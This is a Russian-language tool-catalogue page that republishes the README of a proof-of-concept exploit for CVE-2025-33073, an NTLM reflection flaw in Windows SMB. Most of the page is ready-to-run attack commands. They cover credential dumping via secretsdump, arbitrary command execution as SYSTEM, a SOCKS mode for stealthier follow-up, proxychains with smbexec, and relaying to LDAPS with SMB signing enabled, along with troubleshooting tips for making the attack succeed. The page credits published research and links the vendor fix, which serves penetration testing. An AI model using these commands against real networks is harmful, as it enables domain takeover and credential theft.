Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-33073 — PoC-эксплойт для уязвимости SMB, связанной с рефлексией NTLM. | Kitploit
Инструменты/GitHubGitHub/mverschu/cve-2025-33073
Повышение привилегийАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеАутентификация
GitHubmverschu/cve-2025-33073

CVE-2025-33073

PoC-эксплойт для уязвимости SMB, связанной с рефлексией NTLM.

Репозиторий
7141366 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-33073

PoC-эксплойт для NTLM reflection уязвимости SMB.

image

Все заслуги принадлежат официальному исследованию:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Предварительные требования

ОС: Kali Linux (большинство пакетов уже предустановлено).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (включён в репозиторий)

Установка

Инструмент автоматически использует виртуальное окружение. Для настройки выполните:

root@kitploit:~
./setup.sh

Это создаст виртуальное окружение и установит все необходимые зависимости, включая ldap3-bleeding-edge==2.10.1.1337.

Пример использования

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
image

Произвольная команда
Вместо запуска secretsdump может быть выполнена произвольная команда.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

image

SOCKS
Для более скрытного выполнения команд после установления валидного соединения с правами SYSTEM. В этом случае --target и --target-ip должны совпадать.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

image Также через proxychains может быть выполнена произвольная команда вместо дампа SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Эксплуатация relay на LDAPS даже при включённой SMB Signing

Было проведено исследование, чтобы проверить, действительно ли reflection не работает при включённой SMB Signing. В результате были найдены баги: если удалить SIGN/SEAL из пакета, становится возможным relay с SMB на LDAPS, что обычно невозможно из-за MIC.

Благодарности:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
image

Ручная эксплуатация без требования DNS

Если вы находитесь в том же широковещательном домене, что и устройство, и оно уязвимо к LLMNR poisoning, можно эксплуатировать устройство без необходимости регистрировать DNS-запись.

image

Поиск и устранение неисправностей

  • Иногда атака не срабатывает, потому что при атаке используется имя хоста, что приводит к DNS-запросу с Kali. Если Kali не использует нужный DNS-сервер или вы получаете сообщение '/ FAILED' от impacket-ntlmrelayx, попробуйте добавить хост в файл /etc/hosts. Это должно привести к успешной атаке.
  • При использовании IP-адреса атака должна работать. Иногда многократный запуск приводит к SUCCESS вместо неудачи. До сих пор до конца не ясно, почему это происходит. Думаю, это связано с сетью.
  • Попробуйте другой метод coerce с помощью -M или --method.

Wireshark

Локальная NTLM-аутентификация выполняется image

Локальная NTLM-аутентификация не выполняется, что приводит к неудаче (FAILED) image

Полезно знать

  • DNS-запись также должна быть известна клиенту; в некоторых случаях это может занять больше времени. Под «больше времени» я имею в виду пару минут.
  • Это всего лишь PoC, то есть обход AV/EDR не тестировался. Используйте на свой страх и риск.

Как исправить

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Скачать инструмент